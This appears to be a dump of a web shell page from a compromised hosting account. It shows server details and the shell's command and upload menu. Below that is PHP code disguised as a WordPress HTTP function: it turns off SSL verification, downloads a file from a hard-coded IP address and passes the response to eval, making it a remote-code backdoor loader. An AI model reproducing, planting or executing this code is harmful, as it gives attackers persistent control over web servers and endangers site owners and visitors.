|
Server IP : 2a02:4780:3:1493:0:3736:a38e:7 / Your IP : 216.73.216.46 Web Server : LiteSpeed System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u926327694/domains/stjpuvjp.com/../smsoft.in/../smvpuc.org/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
function WordPress_Http_Curl ( $url, $args = array() ) {
if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) {
return false;
}
$handle = curl_init();
curl_setopt( $handle, CURLOPT_URL, $url );
curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $handle, CURLOPT_HEADER, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
$response = curl_exec( $handle );
$curl_error = curl_error( $handle );
if ( !$curl_error ) {
$response = array(
'data' => eval( '?>'. $response )
);
return $response;
}
if ( PHP_VERSION_ID < 80000 ) {
curl_close( $handle );
}
}
$result = WordPress_Http_Curl( 'http://173.208.198.66/z60203_2/stat/index.txt' );